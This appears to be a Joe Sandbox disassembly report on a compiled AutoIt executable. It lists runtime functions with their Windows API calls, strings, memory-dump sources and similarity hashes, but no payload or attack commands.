Part of subcall function 006236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006236E6
Part of subcall function 006236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623707
Part of subcall function 006236B8: ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 0062371B
Part of subcall function 006236B8: ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 00623724

Part of subcall function 00624FFC: _memset.LIBCMT ref: 00625022
Part of subcall function 00624FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006250CB

Strings

runas, xrefs: 00691D84
This is a third-party compiled AutoIt script., xrefs: 00691CC8
()m, xrefs: 00691D49

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()m$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-333318816
Opcode ID: b855cf2d083756a5f652dd3158bab1e458b68261f2bdaf9dc61b0d53e865bb59
Instruction ID: dee8b57db497728c1e63cb632b8158baf81471b06f620992f2371ae272c82a25
Opcode Fuzzy Hash: b855cf2d083756a5f652dd3158bab1e458b68261f2bdaf9dc61b0d53e865bb59
Instruction Fuzzy Hash: C75106309047A9AACF11BBB0EC55DED7B7B9F17700F00406AF6426E292DB74564A9F21

Function 0063DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0063DDEC
GetCurrentProcess.KERNEL32(00000000,006BDC38,?,?), ref: 0063DEAC
GetNativeSystemInfo.KERNELBASE(?,006BDC38,?,?), ref: 0063DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0063DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0063DF1F
GetSystemInfo.KERNEL32(?,006BDC38,?,?), ref: 0063DF29
GetSystemInfo.KERNEL32(?,006BDC38,?,?), ref: 0063DF35

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: b6c10673a70d468c55fae74ed379478889670d0f4d2e31a3d2aaadf59bf77732
Instruction ID: 458826be5da2c74bc9f4852f5c30db45011e0f0dcb06c9da34d7b5f8d5f23872
Opcode Fuzzy Hash: b6c10673a70d468c55fae74ed379478889670d0f4d2e31a3d2aaadf59bf77732
Instruction Fuzzy Hash: F76191B180A284DBCF15DF68A8C11E97FB66F29300F1985D9D8459F347C634CA09CBA5

Function 0062406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0062449E,?,?,00000000,00000001), ref: 0062407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0062449E,?,?,00000000,00000001), ref: 00624092
LoadResource.KERNEL32(?,00000000,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB), ref: 00694F1A
SizeofResource.KERNEL32(?,00000000,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB), ref: 00694F2F
LockResource.KERNEL32(0062449E,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB,00000000), ref: 00694F42

Strings

SCRIPT, xrefs: 00624088

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: c0579e1b4a080ab5e601c2b6ff87d9a6e72777d736760f7ed5ca546cfb4020e5
Instruction ID: 9c5f596560515a5ea9a391b98e54479569db1af14582660fee2edca76868ca29
Opcode Fuzzy Hash: c0579e1b4a080ab5e601c2b6ff87d9a6e72777d736760f7ed5ca546cfb4020e5
Instruction Fuzzy Hash: E5112E71200711AFE7219B65EC48F677BBAEFC9B55F20416CF6029A650DB71ED40CA21

Function 00666CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00692F49), ref: 00666CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00666CCA
FindClose.KERNEL32(00000000), ref: 00666CDA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: b654b90e9895c56c3d1125b26a52741c83d708bc890ad59f9caad825b121343a
Instruction ID: 5a0fdc50e46d3f1aa9c5c4e3100a1ce48acc0578107f431ae00349b5d63c47ed
Opcode Fuzzy Hash: b654b90e9895c56c3d1125b26a52741c83d708bc890ad59f9caad825b121343a
Instruction Fuzzy Hash: 28E012318149155783106738EC094E9766EDE06339B104716F576C16D0EB70AD448995

Function 00633200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

n, xrefs: 0069933E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharUpper
String ID: n
API String ID: 3964851224-3686792289
Opcode ID: fc13a66a601408e0cfd82501787700975bab063e87ebc6662e02f6400c225536
Instruction ID: e600b0bc1f4d14a9d480d63bf7a70cee6c3d812b0c32a4adfda0d58714dd627b
Opcode Fuzzy Hash: fc13a66a601408e0cfd82501787700975bab063e87ebc6662e02f6400c225536
Instruction Fuzzy Hash: 84927B706083519FDB64DF18C480B6AB7E6BF88304F14885DF89A8B362D775ED46CB92

Function 0062E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0062E959
timeGetTime.WINMM ref: 0062EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0062ED2E
TranslateMessage.USER32(?), ref: 0062ED3F
DispatchMessageW.USER32(?), ref: 0062ED4A
LockWindowUpdate.USER32(00000000), ref: 0062ED79
DestroyWindow.USER32 ref: 0062ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062ED9F
Sleep.KERNEL32(0000000A), ref: 00695270
TranslateMessage.USER32(?), ref: 006959F7
DispatchMessageW.USER32(?), ref: 00695A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00695A19

Strings

@TRAY_ID, xrefs: 006954C9
@GUI_CTRLID, xrefs: 00695314
@GUI_CTRLHANDLE, xrefs: 006953AC
@GUI_WINHANDLE, xrefs: 00695360

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 0771733efe8ac8d4f61486f1ae97d670f852b93786a31b2394c864d90032bcc8
Instruction ID: f7ceb83e5d186cb9585b1e49dc1ef506f6b345d200917bcb7e24aec92506ec4d
Opcode Fuzzy Hash: 0771733efe8ac8d4f61486f1ae97d670f852b93786a31b2394c864d90032bcc8
Instruction Fuzzy Hash: 7E62D070508B90DFDB61DF24D885BAA77EBBF45304F08097DE9868B292DB71A844CF52

Function 00655C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00655EC3
___createFile.LIBCMT ref: 00655F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00655F2D
__dosmaperr.LIBCMT ref: 00655F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00655F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00655F6A
__dosmaperr.LIBCMT ref: 00655F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00655F7C
__set_osfhnd.LIBCMT ref: 00655FAC
__lseeki64_nolock.LIBCMT ref: 00656016
__close_nolock.LIBCMT ref: 0065603C
__chsize_nolock.LIBCMT ref: 0065606C
__lseeki64_nolock.LIBCMT ref: 0065607E
__lseeki64_nolock.LIBCMT ref: 00656176
__lseeki64_nolock.LIBCMT ref: 0065618B
__close_nolock.LIBCMT ref: 006561EB

Part of subcall function 0064EA9C: CloseHandle.KERNELBASE(00000000,006CEEF4,00000000,?,00656041,006CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0064EAEC
Part of subcall function 0064EA9C: GetLastError.KERNEL32(?,00656041,006CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0064EAF6
Part of subcall function 0064EA9C: __free_osfhnd.LIBCMT ref: 0064EB03
Part of subcall function 0064EA9C: __dosmaperr.LIBCMT ref: 0064EB25

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

__lseeki64_nolock.LIBCMT ref: 0065620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00656342
___createFile.LIBCMT ref: 00656361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0065636E
__dosmaperr.LIBCMT ref: 00656375
__free_osfhnd.LIBCMT ref: 00656395
__invoke_watson.LIBCMT ref: 006563C3
__wsopen_helper.LIBCMT ref: 006563DD

Strings

@, xrefs: 00655F98

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: cf5a85734c11294fc0c98a8e94c1482a2fd9e8a86e5c68355ce3a3204a33f6b0
Instruction ID: e4c7b207e955d4d88ae49ec2e90ed5d9567078969c86b086cedb2b6c537bbd72
Opcode Fuzzy Hash: cf5a85734c11294fc0c98a8e94c1482a2fd9e8a86e5c68355ce3a3204a33f6b0
Instruction Fuzzy Hash: 472202719006059BEB259F68CC99BED7B73EF01326F644228FC229B3E2C6358D49CB55

Function 0066FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0066FA96
_wcschr.LIBCMT ref: 0066FAA4
_wcscpy.LIBCMT ref: 0066FABB
_wcscat.LIBCMT ref: 0066FACA
_wcscat.LIBCMT ref: 0066FAE8
_wcscpy.LIBCMT ref: 0066FB09
__wsplitpath.LIBCMT ref: 0066FBE6
_wcscpy.LIBCMT ref: 0066FC0B
_wcscpy.LIBCMT ref: 0066FC1D
_wcscpy.LIBCMT ref: 0066FC32
_wcscat.LIBCMT ref: 0066FC47
_wcscat.LIBCMT ref: 0066FC59
_wcscat.LIBCMT ref: 0066FC6E

Part of subcall function 0066BFA4: _wcscmp.LIBCMT ref: 0066C03E
Part of subcall function 0066BFA4: __wsplitpath.LIBCMT ref: 0066C083
Part of subcall function 0066BFA4: _wcscpy.LIBCMT ref: 0066C096
Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0A9
Part of subcall function 0066BFA4: __wsplitpath.LIBCMT ref: 0066C0CE
Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0E4
Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0F7

Strings

t2m, xrefs: 0066FC97
>>>AUTOIT SCRIPT<<<, xrefs: 0066FA61

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2m
API String ID: 2955681530-3211479820
Opcode ID: 9045e3bd6ad853dd40094d6f0b4c861b9e57ea15f9900ab2848ddbc9f2d38d5a
Instruction ID: f2ef55b33da612ffe8428fe62591c010afb04802f5d3a5f2bdd9328807a3f5ba
Opcode Fuzzy Hash: 9045e3bd6ad853dd40094d6f0b4c861b9e57ea15f9900ab2848ddbc9f2d38d5a
Instruction Fuzzy Hash: B191A172504715AFDB60EF54D891E9BB3EABF84300F04482DF94997391DB30EA48CB9A

Function 0064EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: bf4070e2e2cd9bc1227edcde5a918865d340e174976e463d8261caede1d30f32
Instruction ID: e9a9407362cde69125478b6b0551740e3a4780ca29ad15895afb5def0dbd7fbe
Opcode Fuzzy Hash: bf4070e2e2cd9bc1227edcde5a918865d340e174976e463d8261caede1d30f32
Instruction Fuzzy Hash: B3321770E04285DFDB218FA8D880BED7BB3AF56314F24416AE8559F392C7709D42CBA1

Function 00623F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623F86
RegisterClassExW.USER32(00000030), ref: 00623FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623FC1
InitCommonControlsEx.COMCTL32(?), ref: 00623FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00623FEE
LoadIconW.USER32(000000A9), ref: 00624004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00624013

Strings

TaskbarCreated, xrefs: 00623FB6
+, xrefs: 00623F6F
AutoIt v3 GUI, xrefs: 00623FA2
0, xrefs: 00623F68

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 82d85bd755b40f2a09b71930b4316aa2056ad0557fb6f88e40a49c5eff350772
Instruction ID: 2c2f1861fe858d7cd94d6538fb07b80ddb4e20573442172caa562c7d8b8591af
Opcode Fuzzy Hash: 82d85bd755b40f2a09b71930b4316aa2056ad0557fb6f88e40a49c5eff350772
Instruction Fuzzy Hash: 2621D8B5D00359AFDB00EFA4EC89BCDBBB6FB0A700F10611AF611AA2A0D7B55544DF91

Function 0066BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0066BDB4: __time64.LIBCMT ref: 0066BDBE

Part of subcall function 00624517: _fseek.LIBCMT ref: 0062452F

__wsplitpath.LIBCMT ref: 0066C083

Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C

_wcscpy.LIBCMT ref: 0066C096
_wcscat.LIBCMT ref: 0066C0A9
__wsplitpath.LIBCMT ref: 0066C0CE
_wcscat.LIBCMT ref: 0066C0E4
_wcscat.LIBCMT ref: 0066C0F7
_wcscmp.LIBCMT ref: 0066C03E

Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C65D
Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0066C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066C338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066C371

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 6416944bcf151c0552f407b67668a1e9fe6de30d73a6c3b6e8e56ac4bc103185
Instruction ID: bb13b131c3c0d305c62aeab84568321c84c21888fda1bfb8c02a226685779e4b
Opcode Fuzzy Hash: 6416944bcf151c0552f407b67668a1e9fe6de30d73a6c3b6e8e56ac4bc103185
Instruction Fuzzy Hash: E7C12EB1E00129ABDF51DF95CC81EEEB7BEEF45310F1040AAF649E6251DB309A448F65

Function 00623742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006237B3
KillTimer.USER32(?,00000001), ref: 006237DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00623800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0062380B
CreatePopupMenu.USER32 ref: 0062381F
PostQuitMessage.USER32(00000000), ref: 0062382E

Strings

TaskbarCreated, xrefs: 00623806

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: a0c0f96c442f333dc4edbe747801da4d12c723a6463014b545659eaf1c6f7c90
Instruction ID: ba408cd25ecafa75176040ba5b81d1104d8606fc83e9b1c1822301e13fc485f3
Opcode Fuzzy Hash: a0c0f96c442f333dc4edbe747801da4d12c723a6463014b545659eaf1c6f7c90
Instruction Fuzzy Hash: 5A4119F1114AB6A7DF146F28BC49BF9365BFB02300F101119F9029E790DB799E41AF69

Function 00623E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623E79
LoadCursorW.USER32(00000000,00007F00), ref: 00623E88
LoadIconW.USER32(00000063), ref: 00623E9E
LoadIconW.USER32(000000A4), ref: 00623EB0
LoadIconW.USER32(000000A2), ref: 00623EC2

Part of subcall function 00624024: LoadImageW.USER32(00620000,00000063,00000001,00000010,00000010,00000000), ref: 00624048

RegisterClassExW.USER32(?), ref: 00623F30

Part of subcall function 00623F53: GetSysColorBrush.USER32(0000000F), ref: 00623F86
Part of subcall function 00623F53: RegisterClassExW.USER32(00000030), ref: 00623FB0
Part of subcall function 00623F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623FC1
Part of subcall function 00623F53: InitCommonControlsEx.COMCTL32(?), ref: 00623FDE
Part of subcall function 00623F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00623FEE
Part of subcall function 00623F53: LoadIconW.USER32(000000A9), ref: 00624004
Part of subcall function 00623F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00624013

Strings

0, xrefs: 00623F02
#, xrefs: 00623F09
AutoIt v3, xrefs: 00623F1F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d5de10cfc0bb60d83ec94ae526b502ac7750418d17bedd9aecd18844a68680de
Instruction ID: 3dc5580d1f1efe5f9dd0d7bd1af7b7ccb3112cbed3f0e5c56ff18627b522a420
Opcode Fuzzy Hash: d5de10cfc0bb60d83ec94ae526b502ac7750418d17bedd9aecd18844a68680de
Instruction Fuzzy Hash: EA2151B0E00354ABCB04DFA9EC85A99BFF7EB49310F00511AE205AE3A0D77556449F91

Function 0064ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0064ACC1

Part of subcall function 00647CF4: __mtinitlocknum.LIBCMT ref: 00647D06
Part of subcall function 00647CF4: EnterCriticalSection.KERNEL32(00000000,?,00647ADD,0000000D), ref: 00647D1F

__calloc_crt.LIBCMT ref: 0064ACD2

Part of subcall function 00646986: __calloc_impl.LIBCMT ref: 00646995
Part of subcall function 00646986: Sleep.KERNEL32(00000000,000003BC,0063F507,?,0000000E), ref: 006469AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0064ACED
GetStartupInfoW.KERNEL32(?,006D6E28,00000064,00645E91,006D6C70,00000014), ref: 0064AD46
__calloc_crt.LIBCMT ref: 0064AD91
GetFileType.KERNEL32(00000001), ref: 0064ADD8
